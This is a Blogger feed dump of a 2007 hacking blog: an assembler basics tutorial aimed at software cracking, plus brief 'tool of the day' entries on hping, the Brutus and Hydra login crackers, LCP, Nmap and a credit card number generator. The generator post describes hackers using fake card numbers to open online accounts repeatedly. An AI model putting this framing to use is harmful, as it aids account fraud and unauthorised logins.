style="font-family:Arial;"&gt;ECX:&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt; Extended Counter Register&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;EDX:&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt; Extended Data Register&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;ESI:&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt; Extended Source Index&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;EDI:&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt; Extended Destination Index&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;EBP:&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt; Extended Base Pointer&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;ESP:&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt; Extended Stack Pointer&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;EIP:&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt; Extended Instruction Pointer&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-INDENT: 35.4pt; TEXT-ALIGN: justify"&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Generally the size of the registers is 32bit (=4 bytes). They can hold data from 0-FFFFFFFF (unsigned). In the beginning most registers had certain main functions which the names imply, like ECX = Counter, but in these days you can - nearly - use whichever register you like for a counter or stuff (only the self defined ones, there are counter-functions which need to be used with ECX). The functions of EAX, EBX, ECX, EDX, ESI and EDI will be explained when I explain certain functions that use those registers. So, there are EBP, ESP, EIP left:&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;br /&gt;EBP&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;: EBP has mostly to do with stack and stack frames. Nothing you really need to worry about, when you start.&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;ESP:&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt; ESP points to the stack of a current process. The stack is the place where data can be stored for later use (for more information, see the explanation of the push/pop instructions)&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;EIP:&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt; EIP always points to the next instruction that is to be executed.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;There's one more thing you have to know about registers: although they are all 32bits large, some parts of them (16bit or even 8bit) can not be addressed directly. &lt;/span&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;So, EAX is the name of the 32bit register, AX is the name of the "Low Word" (16bit) of EAX and AL/AH (8bit) are the “names” of the "Low Part" and “High Part” of AX. BTW, 4 bytes is 1 DWORD, 2 bytes is 1 WORD.&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;b&gt;&lt;u&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;The FLAGS:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;Z-Flag:&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt; It is the most useful flag for cracking. It is used in about 90% of all cases. It can be set (status: 1) or cleared (status: 0) by several opcodes when the last instruction that was performed has 0 as result. You might wonder why "CMP" (more on this later) could set the zero flag, because it compares something - how can the result of the comparison be 0? The answer on this comes later ;)&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt; &lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;O-Flag:&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt; It is used in about 4% of all cracking attempts. It is set (status: 1) when the last operation changed the highest bit of the register that gets the result of an operation. For example: EAX holds the value 7FFFFFFF. If you use an operation now, which increases EAX by 1 the O-Flag would be set, because the operation changed the highest bit of EAX (which is not set in 7FFFFFFF, but set in 80000000 - use calc.exe to convert hexadecimal values to binary values). Another need for the O-Flag to be set, is that the value of the destination register is neither 0 before the instruction nor after it.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;C-Flag: &lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;It is used in about 1% of all cracking attempts. It is set, if you add a value to a register, so that it gets bigger than FFFFFFFF or if you subtract a value, so that the register value gets smaller than 0.&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;b&gt;&lt;u&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;The STACK:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;The Stack is a part in memory where you can store different things for later use. See t as a pile of books in a chest where the last put in is the first to grab out. Or imagine the stack as a paper basket where you put in sheets. The basket is the stack and a sheet is a memory address (indicated by the stack pointer) in that stack segment. Remember following rule: the last sheet of paper you put in the stack, is the first one you'll take out! The command 'push' saves the contents of a register onto the stack. The command 'pop' grabs the last saved contents of a register from the stack and puts it in a specific register.&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;b&gt;&lt;u&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;INSTRUCTIONS &lt;i&gt;(alphabetical)&lt;/i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;Most instructions have two operators (like "add EAX, EBX"), but some have one ("not EAX") or even three ("IMUL EAX, EDX, 64"). When you have an instruction that says something with "DWORD PTR [XXX]" then the DWORD (4 byte) value at memory offset [XXX] is meant. Note that the bytes are saved in reverse order in the memory (WinTel CPUs use the so called “Little Endian” format. The same is for "WORD PTR [XXX]" (2 byte) and "BYTE PTR [XXX]" (1 byte).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;--------------------------------------------------------------------------------------------&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="COLOR: rgb(204,0,0)"&gt;&lt;span style="FONT-WEIGHT: bold"&gt;These are the Basics, for detail reading anyone can contact the blog for material at hackinme@gmail.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-5526325622263377943?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/5526325622263377943/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=5526325622263377943' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5526325622263377943'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5526325622263377943'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/basics-of-assembler.html' title='Basics Of Assembler'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-1948452905112136075</id><published>2007-04-23T14:47:00.000+05:30</published><updated>2007-04-26T15:33:50.269+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tool of the day'/><title type='text'>hping</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_tGUVOS5hsyc/Rix6inQG-AI/AAAAAAAAACw/N2j_OreUmpQ/s1600-h/tcp.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 154px; height: 92px;" src="http://3.bp.blogspot.com/_tGUVOS5hsyc/Rix6inQG-AI/AAAAAAAAACw/N2j_OreUmpQ/s200/tcp.jpg" alt="" id="BLOGGER_PHOTO_ID_5056551216700913666" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;hping&lt;/span&gt; is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn't only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify; font-family: arial;"&gt;&lt;br /&gt;&lt;p&gt; While hping was mainly used as a security tool in the past, it can be used in many ways by people that don't care about security to test networks and hosts. A subset of the stuff you can do using hping: &lt;/p&gt;&lt;ul&gt;&lt;li&gt; Firewall testing &lt;/li&gt;&lt;li&gt; Advanced port scanning &lt;/li&gt;&lt;li&gt; Network testing, using different protocols, TOS, fragmentation &lt;/li&gt;&lt;li&gt; Manual path MTU discovery &lt;/li&gt;&lt;li&gt; Advanced traceroute, under all the supported protocols &lt;/li&gt;&lt;li&gt; Remote OS fingerprinting &lt;/li&gt;&lt;li&gt; Remote uptime guessing &lt;/li&gt;&lt;li&gt; TCP/IP stacks auditing &lt;/li&gt;&lt;li&gt; hping can also be useful to students that are learning TCP/IP. &lt;/li&gt;&lt;/ul&gt; &lt;p&gt; Hping works on the following unix-like systems: Linux, FreeBSD, NetBSD, OpenBSD, Solaris, MacOs X, Windows. &lt;/p&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-1948452905112136075?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/1948452905112136075/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=1948452905112136075' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/1948452905112136075'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/1948452905112136075'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/tool-of-day_23.html' title='hping'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_tGUVOS5hsyc/Rix6inQG-AI/AAAAAAAAACw/N2j_OreUmpQ/s72-c/tcp.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-4789865246061234810</id><published>2007-04-20T00:20:00.000+05:30</published><updated>2007-04-26T15:14:21.742+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tool of the day'/><title type='text'>BRUTUS AET2 PASSWORD CRACKER</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt; &lt;/span&gt;&lt;span  lang="EN-GB" style="font-family:trebuchet ms;"&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;Brutus &lt;/span&gt;is one of the fastest and most flexible remote &lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_tGUVOS5hsyc/Rie7fHQG9_I/AAAAAAAAACo/XgckWp0G948/s1600-h/sniffer.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 122px; height: 115px;" src="http://4.bp.blogspot.com/_tGUVOS5hsyc/Rie7fHQG9_I/AAAAAAAAACo/XgckWp0G948/s200/sniffer.jpg" alt="" id="BLOGGER_PHOTO_ID_5055215249943623666" border="0" /&gt;&lt;/a&gt;&lt;span  lang="EN-GB" style="font-family:trebuchet ms;"&gt;passwo&lt;/span&gt;&lt;span  lang="EN-GB" style="font-family:trebuchet ms;"&gt;rd&lt;/span&gt;&lt;span  lang="EN-GB" style="font-family:trebuchet ms;"&gt; crackers available for Windows 9x, NT and 2000, there is no UNIX version available. More specifically it is a remote interactive &lt;/span&gt;&lt;span  lang="EN-GB" style="font-family:trebuchet ms;"&gt;authentication agent. Brutus is used to recover valid access tokens (usually a username and password) for a given target system. Examples of a supported target system might be an FTP server, a password protected web page, a router console a POP3 server etc. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;  &lt;p class="MsoNormal"  style="font-family:trebuchet ms;"&gt;&lt;span style="" lang="EN-GB"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-4789865246061234810?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/4789865246061234810/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=4789865246061234810' title='12 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/4789865246061234810'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/4789865246061234810'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/tool-of-day_20.html' title='BRUTUS AET2 PASSWORD CRACKER'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_tGUVOS5hsyc/Rie7fHQG9_I/AAAAAAAAACo/XgckWp0G948/s72-c/sniffer.jpg' height='72' width='72'/><thr:total>12</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-6749039019404153936</id><published>2007-04-18T00:27:00.000+05:30</published><updated>2007-04-26T15:15:49.862+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tool of the day'/><title type='text'>THC-Hydra &gt;&gt;&gt; Network Login Hacking Tool</title><content type='html'>&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span class="single-title"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style="font-size:130%;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_tGUVOS5hsyc/RiUZDMNYp_I/AAAAAAAAACg/0yr9WVXgb84/s1600-h/Gazillionaire.gif"&gt;&lt;img id="BLOGGER_PHOTO_ID_5054473699400919026" style="margin: 0pt 0pt 10px 10px; float: right; width: 95px; cursor: pointer; height: 95px;" alt="" src="http://4.bp.blogspot.com/_tGUVOS5hsyc/RiUZDMNYp_I/AAAAAAAAACg/0yr9WVXgb84/s200/Gazillionaire.gif" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;i style="font-family: arial;"&gt;&lt;b&gt;Hydra&lt;/b&gt;&lt;/i&gt;&lt;span style="font-family:arial;"&gt; is a software project developed by "The Hacker's Choice" (THC) that uses a dictionary attack to test for weak or simple passwords on one or many remote hosts running a variety of different service.&lt;/span&gt;&lt;span style=";font-family:Arial;font-size:12;"  &gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal"  style="text-align: justify;font-family:arial;"&gt;&lt;span style=";font-family:arial;font-size:100%;"  &gt;Number one of the biggest security holes are passwords, as every password security study shows.&lt;span style="font-size:0;"&gt; &lt;/span&gt;Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that; it is flexible and very fast.&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre  style="text-align: justify;font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold; font-family: arial;"&gt;Currently this tool supports:&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;font-size:12;"  &gt;&lt;span style=";font-family:arial;font-size:100%;"  &gt;TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,&lt;br /&gt;RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS,&lt;br /&gt;ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, LDAP2,&lt;br /&gt;Cisco AAA (incorporated in telnet module).&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-6749039019404153936?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/6749039019404153936/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=6749039019404153936' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/6749039019404153936'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/6749039019404153936'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/tool-of-day_18.html' title='THC-Hydra &gt;&gt;&gt; Network Login Hacking Tool'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_tGUVOS5hsyc/RiUZDMNYp_I/AAAAAAAAACg/0yr9WVXgb84/s72-c/Gazillionaire.gif' height='72' width='72'/><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-5883404631301413373</id><published>2007-04-16T00:07:00.000+05:30</published><updated>2007-04-26T15:16:50.226+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tool of the day'/><title type='text'>LCP</title><content type='html'>&lt;p  style="text-align: justify;font-family:arial;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_tGUVOS5hsyc/RiJyxMNYp-I/AAAAAAAAACY/gnUfokdrkaY/s1600-h/encrypt.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 102px; height: 106px;" src="http://1.bp.blogspot.com/_tGUVOS5hsyc/RiJyxMNYp-I/AAAAAAAAACY/gnUfokdrkaY/s200/encrypt.jpg" alt="" id="BLOGGER_PHOTO_ID_5053727921279641570" border="0" /&gt;&lt;/a&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;LCP&lt;/span&gt; pr&lt;/span&gt;&lt;span style="font-size:100%;"&gt;ogram is used for auditing and recovering user account passwords in Windows NT/2000/XP/2003. Some other functions include Accounts information import, Passwords recovery, Brute force session distribution, Hashes &lt;/span&gt;&lt;span style="font-size:100%;"&gt;computing, etc.&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p face="arial" style="text-align: justify;"&gt;&lt;span style="font-size:100%;"&gt;Windows NT / 2000 / X&lt;/span&gt;&lt;span style="font-size:100%;"&gt;P / 2003 operating systems keeps their password into an encrypted form called "hashes". Passwords cannot be retrieved directly from hashes. To recover passwords it is necessary to compute hashes by possible passwords &amp;amp; compare them to existing hashes. Password auditing includes check of possible ways to retrieve user accounts information.&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;span style=";font-family:trebuchet ms;font-size:130%;"  &gt;&lt;span style="font-size:10;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-5883404631301413373?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/5883404631301413373/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=5883404631301413373' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5883404631301413373'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5883404631301413373'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/tool-of-day_16.html' title='LCP'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_tGUVOS5hsyc/RiJyxMNYp-I/AAAAAAAAACY/gnUfokdrkaY/s72-c/encrypt.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-70446467054149353</id><published>2007-04-14T00:06:00.000+05:30</published><updated>2007-04-26T15:17:15.859+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tool of the day'/><title type='text'>MASTER CREDIT CARD GENERATOR</title><content type='html'>&lt;a name="793"&gt;&lt;/a&gt;&lt;a name="ap-blev2sec11"&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_tGUVOS5hsyc/Rh_OWsNYp9I/AAAAAAAAACQ/yzVQOl3mKAQ/s1600-h/CREDIT.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 109px; height: 94px;" src="http://4.bp.blogspot.com/_tGUVOS5hsyc/Rh_OWsNYp9I/AAAAAAAAACQ/yzVQOl3mKAQ/s200/CREDIT.jpg" alt="" id="BLOGGER_PHOTO_ID_5052984196152731602" border="0" /&gt;&lt;/a&gt; &lt;p style="text-align: justify;" class="first-para"&gt;By using  a program such as Master Credit Card Generator, hackers could create fictitious  credit card numbers to help them set up Internet accounts through online  services. Once the online service verified that the  credit card number wasn't valid, they would shut down the hacker's account, but  with the aid of a few dozen more credit card numbers, hackers could simply  create new accounts over and over again.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-70446467054149353?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/70446467054149353/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=70446467054149353' title='16 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/70446467054149353'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/70446467054149353'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/tool-of-day_14.html' title='MASTER CREDIT CARD GENERATOR'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_tGUVOS5hsyc/Rh_OWsNYp9I/AAAAAAAAACQ/yzVQOl3mKAQ/s72-c/CREDIT.jpg' height='72' width='72'/><thr:total>16</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-6311885279603880429</id><published>2007-04-12T12:37:00.000+05:30</published><updated>2007-04-26T15:25:38.355+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tool of the day'/><title type='text'>NMAP</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_tGUVOS5hsyc/Rh3e5sNYp8I/AAAAAAAAACI/ATPsII4ileU/s1600-h/hacking.gif"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 118px; height: 100px;" src="http://2.bp.blogspot.com/_tGUVOS5hsyc/Rh3e5sNYp8I/AAAAAAAAACI/ATPsII4ileU/s200/hacking.gif" alt="" id="BLOGGER_PHOTO_ID_5052439439680776130" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Considered one of the best scanning tools for probing a system, &lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;Nmap&lt;/span&gt;  incorporates almost every scanning technique known into one single program.  Depending on the scanning option you use, Nmap can offer you speed or stealth  (to prevent a target computer from knowing it's being probed) using a variety of  different protocols (ICMP, UDP, TCP, etc.). You can safely assume that given  enough time, Nmap can find an opening in practically any computer.&lt;br /&gt;&lt;/div&gt;&lt;p style="text-align: justify;" class="last-para"&gt;Nmap runs on UNIX-based operating systems such as Linux and comes with full C/C++ source code that you can study and modify. Nmap is the most powerful scanning tool available to both system  administrators and hackers.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 